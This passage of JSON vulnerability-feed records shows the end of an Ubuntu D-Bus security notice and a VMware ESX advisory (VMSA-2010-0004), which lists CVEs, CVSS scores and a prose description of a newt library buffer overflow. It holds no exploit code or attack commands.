(CVE-2008-3834)", "edition": 5, "modified": "2008-10-14T00:00:00", "published": "2008-10-14T00:00:00", "id": "USN-653-1", "href": "https://ubuntu.com/security/notices/USN-653-1", "title": "D-Bus vulnerabilities", "type": "ubuntu", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2019-11-06T16:05:46", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3613", "CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-3621", "CVE-2008-4316", "CVE-2009-3726", "CVE-2008-3916", "CVE-2009-3563", "CVE-2009-1387", "CVE-2009-0115", "CVE-2009-2904", "CVE-2009-1378", "CVE-2009-0590", "CVE-2008-4552", "CVE-2009-3547", "CVE-2009-2905", "CVE-2009-3620", "CVE-2009-2908", "CVE-2009-3720", "CVE-2009-1189", "CVE-2009-3228", "CVE-2009-3560", "CVE-2009-3286", "CVE-2009-3612", "CVE-2009-2695", "CVE-2009-4022", "CVE-2009-2849"], "description": "a. vMA and Service Console update for newt to 0.52.2-12.el5_4.1 \n \nNewt is a programming library for color text mode, widget based user interfaces. Newt can be used to add stacked windows, entry widgets, checkboxes, radio buttons, labels, plain text fields, scrollbars, etc., to text mode user interfaces. \nA heap-based buffer overflow flaw was found in the way newt processes content that is to be displayed in a text dialog box. A local attacker could issue a specially-crafted text dialog box display request (direct or via a custom application), leading to a denial of service (application crash) or, potentially, arbitrary code execution with the privileges of the user running the application using the newt library. \nThe Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-2905 to this issue. \nThe following table lists what action remediates the vulnerability (column 4) if a solution is available. \n\n", "edition": 4, "modified": "2010-10-06T00:00:00", "published": "2010-03-03T00:00:00", "id": "VMSA-2010-0004", "href": "https://www.vmware.com/security/advisories/VMSA-2010-0004.html", "title": "ESX Service Console and vMA third party updates", "type": "vmware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
